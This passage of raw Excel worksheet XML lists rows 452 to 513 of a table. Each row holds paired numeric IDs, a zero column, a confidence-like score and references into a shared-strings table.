      </c>
      <c r="B452">
        <v>1416</v>
      </c>
      <c r="C452">
        <v>1416</v>
      </c>
      <c r="D452">
        <v>0</v>
      </c>
      <c r="E452">
        <v>0.98320001363754272</v>
      </c>
      <c r="F452" t="s">
        <v>7</v>
      </c>
      <c r="G452" t="s">
        <v>901</v>
      </c>
      <c r="H452" t="s">
        <v>902</v>
      </c>
    </row>
    <row r="453" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A453" s="1">
        <v>451</v>
      </c>
      <c r="B453">
        <v>1417</v>
      </c>
      <c r="C453">
        <v>1417</v>
      </c>
      <c r="D453">
        <v>0</v>
      </c>
      <c r="E453">
        <v>0.99550002813339233</v>
      </c>
      <c r="F453" t="s">
        <v>7</v>
      </c>
      <c r="G453" t="s">
        <v>903</v>
      </c>
      <c r="H453" t="s">
        <v>904</v>
      </c>
    </row>
    <row r="454" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A454" s="1">
        <v>452</v>
      </c>
      <c r="B454">
        <v>1407</v>
      </c>
      <c r="C454">
        <v>1407</v>
      </c>
      <c r="D454">
        <v>0</v>
      </c>
      <c r="E454">
        <v>0.9749000072479248</v>
      </c>
      <c r="F454" t="s">
        <v>7</v>
      </c>
      <c r="G454" t="s">
        <v>905</v>
      </c>
      <c r="H454" t="s">
        <v>906</v>
      </c>
    </row>
    <row r="455" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A455" s="1">
        <v>453</v>
      </c>
      <c r="B455">
        <v>1418</v>
      </c>
      <c r="C455">
        <v>1418</v>
      </c>
      <c r="D455">
        <v>0</v>
      </c>
      <c r="E455">
        <v>0.9682999849319458</v>
      </c>
      <c r="F455" t="s">
        <v>7</v>
      </c>
      <c r="G455" t="s">
        <v>907</v>
      </c>
      <c r="H455" t="s">
        <v>908</v>
      </c>
    </row>
    <row r="456" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A456" s="1">
        <v>454</v>
      </c>
      <c r="B456">
        <v>1420</v>
      </c>
      <c r="C456">
        <v>1420</v>
      </c>
      <c r="D456">
        <v>0</v>
      </c>
      <c r="E456">
        <v>0.87910002470016479</v>
      </c>
      <c r="F456" t="s">
        <v>7</v>
      </c>
      <c r="G456" t="s">
        <v>909</v>
      </c>
      <c r="H456" t="s">
        <v>910</v>
      </c>
    </row>
    <row r="457" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A457" s="1">
        <v>455</v>
      </c>
      <c r="B457">
        <v>1421</v>
      </c>
      <c r="C457">
        <v>1421</v>
      </c>
      <c r="D457">
        <v>0</v>
      </c>
      <c r="E457">
        <v>0.75809997320175171</v>
      </c>
      <c r="F457" t="s">
        <v>7</v>
      </c>
      <c r="G457" t="s">
        <v>911</v>
      </c>
      <c r="H457" t="s">
        <v>912</v>
      </c>
    </row>
    <row r="458" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A458" s="1">
        <v>456</v>
      </c>
      <c r="B458">
        <v>4790</v>
      </c>
      <c r="C458">
        <v>4790</v>
      </c>
      <c r="D458">
        <v>0</v>
      </c>
      <c r="E458">
        <v>0.60740000009536743</v>
      </c>
      <c r="F458" t="s">
        <v>7</v>
      </c>
      <c r="G458" t="s">
        <v>913</v>
      </c>
      <c r="H458" t="s">
        <v>914</v>
      </c>
    </row>
    <row r="459" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A459" s="1">
        <v>457</v>
      </c>
      <c r="B459">
        <v>1425</v>
      </c>
      <c r="C459">
        <v>1425</v>
      </c>
      <c r="D459">
        <v>0</v>
      </c>
      <c r="E459">
        <v>0.73989999294281006</v>
      </c>
      <c r="F459" t="s">
        <v>7</v>
      </c>
      <c r="G459" t="s">
        <v>915</v>
      </c>
      <c r="H459" t="s">
        <v>916</v>
      </c>
    </row>
    <row r="460" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A460" s="1">
        <v>458</v>
      </c>
      <c r="B460">
        <v>7280</v>
      </c>
      <c r="C460">
        <v>7280</v>
      </c>
      <c r="D460">
        <v>0</v>
      </c>
      <c r="E460">
        <v>0.64600002765655518</v>
      </c>
      <c r="F460" t="s">
        <v>7</v>
      </c>
      <c r="G460" t="s">
        <v>917</v>
      </c>
      <c r="H460" t="s">
        <v>918</v>
      </c>
    </row>
    <row r="461" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A461" s="1">
        <v>459</v>
      </c>
      <c r="B461">
        <v>1428</v>
      </c>
      <c r="C461">
        <v>1428</v>
      </c>
      <c r="D461">
        <v>0</v>
      </c>
      <c r="E461">
        <v>0.53930002450942993</v>
      </c>
      <c r="F461" t="s">
        <v>7</v>
      </c>
      <c r="G461" t="s">
        <v>919</v>
      </c>
      <c r="H461" t="s">
        <v>920</v>
      </c>
    </row>
    <row r="462" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A462" s="1">
        <v>460</v>
      </c>
      <c r="B462">
        <v>7279</v>
      </c>
      <c r="C462">
        <v>7279</v>
      </c>
      <c r="D462">
        <v>0</v>
      </c>
      <c r="E462">
        <v>0.85699999332427979</v>
      </c>
      <c r="F462" t="s">
        <v>7</v>
      </c>
      <c r="G462" t="s">
        <v>921</v>
      </c>
      <c r="H462" t="s">
        <v>922</v>
      </c>
    </row>
    <row r="463" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A463" s="1">
        <v>461</v>
      </c>
      <c r="B463">
        <v>1419</v>
      </c>
      <c r="C463">
        <v>1419</v>
      </c>
      <c r="D463">
        <v>0</v>
      </c>
      <c r="E463">
        <v>0.9243999719619751</v>
      </c>
      <c r="F463" t="s">
        <v>7</v>
      </c>
      <c r="G463" t="s">
        <v>923</v>
      </c>
      <c r="H463" t="s">
        <v>924</v>
      </c>
    </row>
    <row r="464" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A464" s="1">
        <v>462</v>
      </c>
      <c r="B464">
        <v>1405</v>
      </c>
      <c r="C464">
        <v>1405</v>
      </c>
      <c r="D464">
        <v>0</v>
      </c>
      <c r="E464">
        <v>0.47249999642372131</v>
      </c>
      <c r="F464" t="s">
        <v>7</v>
      </c>
      <c r="G464" t="s">
        <v>925</v>
      </c>
      <c r="H464" t="s">
        <v>926</v>
      </c>
    </row>
    <row r="465" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A465" s="1">
        <v>463</v>
      </c>
      <c r="B465">
        <v>4798</v>
      </c>
      <c r="C465">
        <v>4798</v>
      </c>
      <c r="D465">
        <v>0</v>
      </c>
      <c r="E465">
        <v>0.61220002174377441</v>
      </c>
      <c r="F465" t="s">
        <v>7</v>
      </c>
      <c r="G465" t="s">
        <v>927</v>
      </c>
      <c r="H465" t="s">
        <v>928</v>
      </c>
    </row>
    <row r="466" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A466" s="1">
        <v>464</v>
      </c>
      <c r="B466">
        <v>7283</v>
      </c>
      <c r="C466">
        <v>7283</v>
      </c>
      <c r="D466">
        <v>0</v>
      </c>
      <c r="E466">
        <v>0.75449997186660767</v>
      </c>
      <c r="F466" t="s">
        <v>7</v>
      </c>
      <c r="G466" t="s">
        <v>929</v>
      </c>
      <c r="H466" t="s">
        <v>930</v>
      </c>
    </row>
    <row r="467" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A467" s="1">
        <v>465</v>
      </c>
      <c r="B467">
        <v>4807</v>
      </c>
      <c r="C467">
        <v>4807</v>
      </c>
      <c r="D467">
        <v>0</v>
      </c>
      <c r="E467">
        <v>0.99860000610351563</v>
      </c>
      <c r="F467" t="s">
        <v>7</v>
      </c>
      <c r="G467" t="s">
        <v>931</v>
      </c>
      <c r="H467" t="s">
        <v>932</v>
      </c>
    </row>
    <row r="468" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A468" s="1">
        <v>466</v>
      </c>
      <c r="B468">
        <v>4805</v>
      </c>
      <c r="C468">
        <v>4805</v>
      </c>
      <c r="D468">
        <v>0</v>
      </c>
      <c r="E468">
        <v>0.87870001792907715</v>
      </c>
      <c r="F468" t="s">
        <v>7</v>
      </c>
      <c r="G468" t="s">
        <v>933</v>
      </c>
      <c r="H468" t="s">
        <v>934</v>
      </c>
    </row>
    <row r="469" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A469" s="1">
        <v>467</v>
      </c>
      <c r="B469">
        <v>1382</v>
      </c>
      <c r="C469">
        <v>1382</v>
      </c>
      <c r="D469">
        <v>0</v>
      </c>
      <c r="E469">
        <v>0.72829997539520264</v>
      </c>
      <c r="F469" t="s">
        <v>7</v>
      </c>
      <c r="G469" t="s">
        <v>935</v>
      </c>
      <c r="H469" t="s">
        <v>936</v>
      </c>
    </row>
    <row r="470" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A470" s="1">
        <v>468</v>
      </c>
      <c r="B470">
        <v>7290</v>
      </c>
      <c r="C470">
        <v>7290</v>
      </c>
      <c r="D470">
        <v>0</v>
      </c>
      <c r="E470">
        <v>0.8093000054359436</v>
      </c>
      <c r="F470" t="s">
        <v>7</v>
      </c>
      <c r="G470" t="s">
        <v>937</v>
      </c>
      <c r="H470" t="s">
        <v>938</v>
      </c>
    </row>
    <row r="471" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A471" s="1">
        <v>469</v>
      </c>
      <c r="B471">
        <v>1389</v>
      </c>
      <c r="C471">
        <v>1389</v>
      </c>
      <c r="D471">
        <v>0</v>
      </c>
      <c r="E471">
        <v>0.92320001125335693</v>
      </c>
      <c r="F471" t="s">
        <v>7</v>
      </c>
      <c r="G471" t="s">
        <v>939</v>
      </c>
      <c r="H471" t="s">
        <v>940</v>
      </c>
    </row>
    <row r="472" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A472" s="1">
        <v>470</v>
      </c>
      <c r="B472">
        <v>4803</v>
      </c>
      <c r="C472">
        <v>4803</v>
      </c>
      <c r="D472">
        <v>0</v>
      </c>
      <c r="E472">
        <v>0.81059998273849487</v>
      </c>
      <c r="F472" t="s">
        <v>7</v>
      </c>
      <c r="G472" t="s">
        <v>941</v>
      </c>
      <c r="H472" t="s">
        <v>942</v>
      </c>
    </row>
    <row r="473" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A473" s="1">
        <v>471</v>
      </c>
      <c r="B473">
        <v>1391</v>
      </c>
      <c r="C473">
        <v>1391</v>
      </c>
      <c r="D473">
        <v>0</v>
      </c>
      <c r="E473">
        <v>0.91649997234344482</v>
      </c>
      <c r="F473" t="s">
        <v>7</v>
      </c>
      <c r="G473" t="s">
        <v>943</v>
      </c>
      <c r="H473" t="s">
        <v>944</v>
      </c>
    </row>
    <row r="474" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A474" s="1">
        <v>472</v>
      </c>
      <c r="B474">
        <v>7287</v>
      </c>
      <c r="C474">
        <v>7287</v>
      </c>
      <c r="D474">
        <v>0</v>
      </c>
      <c r="E474">
        <v>0.57029998302459717</v>
      </c>
      <c r="F474" t="s">
        <v>7</v>
      </c>
      <c r="G474" t="s">
        <v>945</v>
      </c>
      <c r="H474" t="s">
        <v>946</v>
      </c>
    </row>
    <row r="475" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A475" s="1">
        <v>473</v>
      </c>
      <c r="B475">
        <v>1393</v>
      </c>
      <c r="C475">
        <v>1393</v>
      </c>
      <c r="D475">
        <v>0</v>
      </c>
      <c r="E475">
        <v>0.99330002069473267</v>
      </c>
      <c r="F475" t="s">
        <v>7</v>
      </c>
      <c r="G475" t="s">
        <v>947</v>
      </c>
      <c r="H475" t="s">
        <v>948</v>
      </c>
    </row>
    <row r="476" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A476" s="1">
        <v>474</v>
      </c>
      <c r="B476">
        <v>1394</v>
      </c>
      <c r="C476">
        <v>1394</v>
      </c>
      <c r="D476">
        <v>0</v>
      </c>
      <c r="E476">
        <v>0.41839998960495001</v>
      </c>
      <c r="F476" t="s">
        <v>7</v>
      </c>
      <c r="G476" t="s">
        <v>949</v>
      </c>
      <c r="H476" t="s">
        <v>950</v>
      </c>
    </row>
    <row r="477" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A477" s="1">
        <v>475</v>
      </c>
      <c r="B477">
        <v>1395</v>
      </c>
      <c r="C477">
        <v>1395</v>
      </c>
      <c r="D477">
        <v>0</v>
      </c>
      <c r="E477">
        <v>0.99180001020431519</v>
      </c>
      <c r="F477" t="s">
        <v>7</v>
      </c>
      <c r="G477" t="s">
        <v>951</v>
      </c>
      <c r="H477" t="s">
        <v>952</v>
      </c>
    </row>
    <row r="478" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A478" s="1">
        <v>476</v>
      </c>
      <c r="B478">
        <v>4802</v>
      </c>
      <c r="C478">
        <v>4802</v>
      </c>
      <c r="D478">
        <v>0</v>
      </c>
      <c r="E478">
        <v>0.68180000782012939</v>
      </c>
      <c r="F478" t="s">
        <v>7</v>
      </c>
      <c r="G478" t="s">
        <v>953</v>
      </c>
      <c r="H478" t="s">
        <v>954</v>
      </c>
    </row>
    <row r="479" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A479" s="1">
        <v>477</v>
      </c>
      <c r="B479">
        <v>1397</v>
      </c>
      <c r="C479">
        <v>1397</v>
      </c>
      <c r="D479">
        <v>0</v>
      </c>
      <c r="E479">
        <v>0.75989997386932373</v>
      </c>
      <c r="F479" t="s">
        <v>7</v>
      </c>
      <c r="G479" t="s">
        <v>955</v>
      </c>
      <c r="H479" t="s">
        <v>912</v>
      </c>
    </row>
    <row r="480" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A480" s="1">
        <v>478</v>
      </c>
      <c r="B480">
        <v>4801</v>
      </c>
      <c r="C480">
        <v>4801</v>
      </c>
      <c r="D480">
        <v>0</v>
      </c>
      <c r="E480">
        <v>0.80940002202987671</v>
      </c>
      <c r="F480" t="s">
        <v>7</v>
      </c>
      <c r="G480" t="s">
        <v>956</v>
      </c>
      <c r="H480" t="s">
        <v>957</v>
      </c>
    </row>
    <row r="481" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A481" s="1">
        <v>479</v>
      </c>
      <c r="B481">
        <v>4800</v>
      </c>
      <c r="C481">
        <v>4800</v>
      </c>
      <c r="D481">
        <v>0</v>
      </c>
      <c r="E481">
        <v>0.72450000047683716</v>
      </c>
      <c r="F481" t="s">
        <v>7</v>
      </c>
      <c r="G481" t="s">
        <v>958</v>
      </c>
      <c r="H481" t="s">
        <v>959</v>
      </c>
    </row>
    <row r="482" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A482" s="1">
        <v>480</v>
      </c>
      <c r="B482">
        <v>1400</v>
      </c>
      <c r="C482">
        <v>1400</v>
      </c>
      <c r="D482">
        <v>0</v>
      </c>
      <c r="E482">
        <v>0.87150001525878906</v>
      </c>
      <c r="F482" t="s">
        <v>7</v>
      </c>
      <c r="G482" t="s">
        <v>960</v>
      </c>
      <c r="H482" t="s">
        <v>961</v>
      </c>
    </row>
    <row r="483" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A483" s="1">
        <v>481</v>
      </c>
      <c r="B483">
        <v>4799</v>
      </c>
      <c r="C483">
        <v>4799</v>
      </c>
      <c r="D483">
        <v>0</v>
      </c>
      <c r="E483">
        <v>0.69889998435974121</v>
      </c>
      <c r="F483" t="s">
        <v>7</v>
      </c>
      <c r="G483" t="s">
        <v>962</v>
      </c>
      <c r="H483" t="s">
        <v>963</v>
      </c>
    </row>
    <row r="484" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A484" s="1">
        <v>482</v>
      </c>
      <c r="B484">
        <v>4787</v>
      </c>
      <c r="C484">
        <v>4787</v>
      </c>
      <c r="D484">
        <v>0</v>
      </c>
      <c r="E484">
        <v>0.51560002565383911</v>
      </c>
      <c r="F484" t="s">
        <v>7</v>
      </c>
      <c r="G484" t="s">
        <v>964</v>
      </c>
      <c r="H484" t="s">
        <v>965</v>
      </c>
    </row>
    <row r="485" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A485" s="1">
        <v>483</v>
      </c>
      <c r="B485">
        <v>6840</v>
      </c>
      <c r="C485">
        <v>6840</v>
      </c>
      <c r="D485">
        <v>0</v>
      </c>
      <c r="E485">
        <v>0.8026999831199646</v>
      </c>
      <c r="F485" t="s">
        <v>7</v>
      </c>
      <c r="G485" t="s">
        <v>966</v>
      </c>
      <c r="H485" t="s">
        <v>967</v>
      </c>
    </row>
    <row r="486" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A486" s="1">
        <v>484</v>
      </c>
      <c r="B486">
        <v>4724</v>
      </c>
      <c r="C486">
        <v>4724</v>
      </c>
      <c r="D486">
        <v>0</v>
      </c>
      <c r="E486">
        <v>0.99180001020431519</v>
      </c>
      <c r="F486" t="s">
        <v>7</v>
      </c>
      <c r="G486" t="s">
        <v>968</v>
      </c>
      <c r="H486" t="s">
        <v>969</v>
      </c>
    </row>
    <row r="487" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A487" s="1">
        <v>485</v>
      </c>
      <c r="B487">
        <v>1581</v>
      </c>
      <c r="C487">
        <v>1581</v>
      </c>
      <c r="D487">
        <v>0</v>
      </c>
      <c r="E487">
        <v>0.59229999780654907</v>
      </c>
      <c r="F487" t="s">
        <v>7</v>
      </c>
      <c r="G487" t="s">
        <v>970</v>
      </c>
      <c r="H487" t="s">
        <v>971</v>
      </c>
    </row>
    <row r="488" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A488" s="1">
        <v>486</v>
      </c>
      <c r="B488">
        <v>1740</v>
      </c>
      <c r="C488">
        <v>1740</v>
      </c>
      <c r="D488">
        <v>0</v>
      </c>
      <c r="E488">
        <v>0.7685999870300293</v>
      </c>
      <c r="F488" t="s">
        <v>7</v>
      </c>
      <c r="G488" t="s">
        <v>972</v>
      </c>
      <c r="H488" t="s">
        <v>973</v>
      </c>
    </row>
    <row r="489" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A489" s="1">
        <v>487</v>
      </c>
      <c r="B489">
        <v>1741</v>
      </c>
      <c r="C489">
        <v>1741</v>
      </c>
      <c r="D489">
        <v>0</v>
      </c>
      <c r="E489">
        <v>0.72200000286102295</v>
      </c>
      <c r="F489" t="s">
        <v>7</v>
      </c>
      <c r="G489" t="s">
        <v>974</v>
      </c>
      <c r="H489" t="s">
        <v>975</v>
      </c>
    </row>
    <row r="490" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A490" s="1">
        <v>488</v>
      </c>
      <c r="B490">
        <v>1742</v>
      </c>
      <c r="C490">
        <v>1742</v>
      </c>
      <c r="D490">
        <v>0</v>
      </c>
      <c r="E490">
        <v>0.69370001554489136</v>
      </c>
      <c r="F490" t="s">
        <v>7</v>
      </c>
      <c r="G490" t="s">
        <v>976</v>
      </c>
      <c r="H490" t="s">
        <v>977</v>
      </c>
    </row>
    <row r="491" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A491" s="1">
        <v>489</v>
      </c>
      <c r="B491">
        <v>1744</v>
      </c>
      <c r="C491">
        <v>1744</v>
      </c>
      <c r="D491">
        <v>0</v>
      </c>
      <c r="E491">
        <v>0.4982999861240387</v>
      </c>
      <c r="F491" t="s">
        <v>7</v>
      </c>
      <c r="G491" t="s">
        <v>978</v>
      </c>
      <c r="H491" t="s">
        <v>979</v>
      </c>
    </row>
    <row r="492" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A492" s="1">
        <v>490</v>
      </c>
      <c r="B492">
        <v>4653</v>
      </c>
      <c r="C492">
        <v>4653</v>
      </c>
      <c r="D492">
        <v>0</v>
      </c>
      <c r="E492">
        <v>0.99730002880096436</v>
      </c>
      <c r="F492" t="s">
        <v>7</v>
      </c>
      <c r="G492" t="s">
        <v>980</v>
      </c>
      <c r="H492" t="s">
        <v>981</v>
      </c>
    </row>
    <row r="493" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A493" s="1">
        <v>491</v>
      </c>
      <c r="B493">
        <v>7136</v>
      </c>
      <c r="C493">
        <v>7136</v>
      </c>
      <c r="D493">
        <v>0</v>
      </c>
      <c r="E493">
        <v>0.99779999256134033</v>
      </c>
      <c r="F493" t="s">
        <v>7</v>
      </c>
      <c r="G493" t="s">
        <v>982</v>
      </c>
      <c r="H493" t="s">
        <v>983</v>
      </c>
    </row>
    <row r="494" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A494" s="1">
        <v>492</v>
      </c>
      <c r="B494">
        <v>1751</v>
      </c>
      <c r="C494">
        <v>1751</v>
      </c>
      <c r="D494">
        <v>0</v>
      </c>
      <c r="E494">
        <v>0.94249999523162842</v>
      </c>
      <c r="F494" t="s">
        <v>7</v>
      </c>
      <c r="G494" t="s">
        <v>984</v>
      </c>
      <c r="H494" t="s">
        <v>985</v>
      </c>
    </row>
    <row r="495" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A495" s="1">
        <v>493</v>
      </c>
      <c r="B495">
        <v>5930</v>
      </c>
      <c r="C495">
        <v>5930</v>
      </c>
      <c r="D495">
        <v>0</v>
      </c>
      <c r="E495">
        <v>0.65880000591278076</v>
      </c>
      <c r="F495" t="s">
        <v>7</v>
      </c>
      <c r="G495" t="s">
        <v>986</v>
      </c>
      <c r="H495" t="s">
        <v>987</v>
      </c>
    </row>
    <row r="496" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A496" s="1">
        <v>494</v>
      </c>
      <c r="B496">
        <v>4652</v>
      </c>
      <c r="C496">
        <v>4652</v>
      </c>
      <c r="D496">
        <v>0</v>
      </c>
      <c r="E496">
        <v>0.99919998645782471</v>
      </c>
      <c r="F496" t="s">
        <v>7</v>
      </c>
      <c r="G496" t="s">
        <v>988</v>
      </c>
      <c r="H496" t="s">
        <v>989</v>
      </c>
    </row>
    <row r="497" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A497" s="1">
        <v>495</v>
      </c>
      <c r="B497">
        <v>4651</v>
      </c>
      <c r="C497">
        <v>4651</v>
      </c>
      <c r="D497">
        <v>0</v>
      </c>
      <c r="E497">
        <v>0.99360001087188721</v>
      </c>
      <c r="F497" t="s">
        <v>7</v>
      </c>
      <c r="G497" t="s">
        <v>990</v>
      </c>
      <c r="H497" t="s">
        <v>991</v>
      </c>
    </row>
    <row r="498" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A498" s="1">
        <v>496</v>
      </c>
      <c r="B498">
        <v>1757</v>
      </c>
      <c r="C498">
        <v>1757</v>
      </c>
      <c r="D498">
        <v>0</v>
      </c>
      <c r="E498">
        <v>0.80330002307891846</v>
      </c>
      <c r="F498" t="s">
        <v>7</v>
      </c>
      <c r="G498" t="s">
        <v>992</v>
      </c>
      <c r="H498" t="s">
        <v>993</v>
      </c>
    </row>
    <row r="499" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A499" s="1">
        <v>497</v>
      </c>
      <c r="B499">
        <v>1758</v>
      </c>
      <c r="C499">
        <v>1758</v>
      </c>
      <c r="D499">
        <v>0</v>
      </c>
      <c r="E499">
        <v>0.94270002841949463</v>
      </c>
      <c r="F499" t="s">
        <v>7</v>
      </c>
      <c r="G499" t="s">
        <v>994</v>
      </c>
      <c r="H499" t="s">
        <v>995</v>
      </c>
    </row>
    <row r="500" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A500" s="1">
        <v>498</v>
      </c>
      <c r="B500">
        <v>7134</v>
      </c>
      <c r="C500">
        <v>7134</v>
      </c>
      <c r="D500">
        <v>0</v>
      </c>
      <c r="E500">
        <v>0.99779999256134033</v>
      </c>
      <c r="F500" t="s">
        <v>7</v>
      </c>
      <c r="G500" t="s">
        <v>996</v>
      </c>
      <c r="H500" t="s">
        <v>983</v>
      </c>
    </row>
    <row r="501" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A501" s="1">
        <v>499</v>
      </c>
      <c r="B501">
        <v>7133</v>
      </c>
      <c r="C501">
        <v>7133</v>
      </c>
      <c r="D501">
        <v>0</v>
      </c>
      <c r="E501">
        <v>0.73940002918243408</v>
      </c>
      <c r="F501" t="s">
        <v>7</v>
      </c>
      <c r="G501" t="s">
        <v>997</v>
      </c>
      <c r="H501" t="s">
        <v>998</v>
      </c>
    </row>
    <row r="502" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A502" s="1">
        <v>500</v>
      </c>
      <c r="B502">
        <v>1763</v>
      </c>
      <c r="C502">
        <v>1763</v>
      </c>
      <c r="D502">
        <v>0</v>
      </c>
      <c r="E502">
        <v>0.47510001063346857</v>
      </c>
      <c r="F502" t="s">
        <v>7</v>
      </c>
      <c r="G502" t="s">
        <v>999</v>
      </c>
      <c r="H502" t="s">
        <v>1000</v>
      </c>
    </row>
    <row r="503" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A503" s="1">
        <v>501</v>
      </c>
      <c r="B503">
        <v>7132</v>
      </c>
      <c r="C503">
        <v>7132</v>
      </c>
      <c r="D503">
        <v>0</v>
      </c>
      <c r="E503">
        <v>0.48469999432563782</v>
      </c>
      <c r="F503" t="s">
        <v>7</v>
      </c>
      <c r="G503" t="s">
        <v>1001</v>
      </c>
      <c r="H503" t="s">
        <v>1002</v>
      </c>
    </row>
    <row r="504" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A504" s="1">
        <v>502</v>
      </c>
      <c r="B504">
        <v>1755</v>
      </c>
      <c r="C504">
        <v>1755</v>
      </c>
      <c r="D504">
        <v>0</v>
      </c>
      <c r="E504">
        <v>0.96230000257492065</v>
      </c>
      <c r="F504" t="s">
        <v>7</v>
      </c>
      <c r="G504" t="s">
        <v>1003</v>
      </c>
      <c r="H504" t="s">
        <v>129</v>
      </c>
    </row>
    <row r="505" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A505" s="1">
        <v>503</v>
      </c>
      <c r="B505">
        <v>1767</v>
      </c>
      <c r="C505">
        <v>1767</v>
      </c>
      <c r="D505">
        <v>0</v>
      </c>
      <c r="E505">
        <v>0.75120002031326294</v>
      </c>
      <c r="F505" t="s">
        <v>7</v>
      </c>
      <c r="G505" t="s">
        <v>1004</v>
      </c>
      <c r="H505" t="s">
        <v>1005</v>
      </c>
    </row>
    <row r="506" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A506" s="1">
        <v>504</v>
      </c>
      <c r="B506">
        <v>1738</v>
      </c>
      <c r="C506">
        <v>1738</v>
      </c>
      <c r="D506">
        <v>0</v>
      </c>
      <c r="E506">
        <v>0.55110001564025879</v>
      </c>
      <c r="F506" t="s">
        <v>7</v>
      </c>
      <c r="G506" t="s">
        <v>1006</v>
      </c>
      <c r="H506" t="s">
        <v>1007</v>
      </c>
    </row>
    <row r="507" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A507" s="1">
        <v>505</v>
      </c>
      <c r="B507">
        <v>1734</v>
      </c>
      <c r="C507">
        <v>1734</v>
      </c>
      <c r="D507">
        <v>0</v>
      </c>
      <c r="E507">
        <v>0.77139997482299805</v>
      </c>
      <c r="F507" t="s">
        <v>7</v>
      </c>
      <c r="G507" t="s">
        <v>1008</v>
      </c>
      <c r="H507" t="s">
        <v>1009</v>
      </c>
    </row>
    <row r="508" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A508" s="1">
        <v>506</v>
      </c>
      <c r="B508">
        <v>1716</v>
      </c>
      <c r="C508">
        <v>1716</v>
      </c>
      <c r="D508">
        <v>0</v>
      </c>
      <c r="E508">
        <v>0.62480002641677856</v>
      </c>
      <c r="F508" t="s">
        <v>7</v>
      </c>
      <c r="G508" t="s">
        <v>1010</v>
      </c>
      <c r="H508" t="s">
        <v>1011</v>
      </c>
    </row>
    <row r="509" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A509" s="1">
        <v>507</v>
      </c>
      <c r="B509">
        <v>1718</v>
      </c>
      <c r="C509">
        <v>1718</v>
      </c>
      <c r="D509">
        <v>0</v>
      </c>
      <c r="E509">
        <v>0.49930000305175781</v>
      </c>
      <c r="F509" t="s">
        <v>7</v>
      </c>
      <c r="G509" t="s">
        <v>1012</v>
      </c>
      <c r="H509" t="s">
        <v>1013</v>
      </c>
    </row>
    <row r="510" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A510" s="1">
        <v>508</v>
      </c>
      <c r="B510">
        <v>1719</v>
      </c>
      <c r="C510">
        <v>1719</v>
      </c>
      <c r="D510">
        <v>0</v>
      </c>
      <c r="E510">
        <v>0.57330000400543213</v>
      </c>
      <c r="F510" t="s">
        <v>7</v>
      </c>
      <c r="G510" t="s">
        <v>1014</v>
      </c>
      <c r="H510" t="s">
        <v>1015</v>
      </c>
    </row>
    <row r="511" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A511" s="1">
        <v>509</v>
      </c>
      <c r="B511">
        <v>1720</v>
      </c>
      <c r="C511">
        <v>1720</v>
      </c>
      <c r="D511">
        <v>0</v>
      </c>
      <c r="E511">
        <v>0.65619999170303345</v>
      </c>
      <c r="F511" t="s">
        <v>7</v>
      </c>
      <c r="G511" t="s">
        <v>1016</v>
      </c>
      <c r="H511" t="s">
        <v>1017</v>
      </c>
    </row>
    <row r="512" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A512" s="1">
        <v>510</v>
      </c>
      <c r="B512">
        <v>4660</v>
      </c>
      <c r="C512">
        <v>4660</v>
      </c>
      <c r="D512">
        <v>0</v>
      </c>
      <c r="E512">
        <v>0.83359998464584351</v>
      </c>
      <c r="F512" t="s">
        <v>7</v>
      </c>
      <c r="G512" t="s">
        <v>1018</v>
      </c>
      <c r="H512" t="s">
        <v>1019</v>
      </c>
    </row>
    <row r="513" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A513" s="1">
        <v>511</v>
      </c>
      <c r="B513">
        <v>1722</v>
      </c>
      <c r="C513">
        <v>1722</v>
      </c>
      <c r="D513">
        <v>0</v>
      </c>
      <c r="E513">
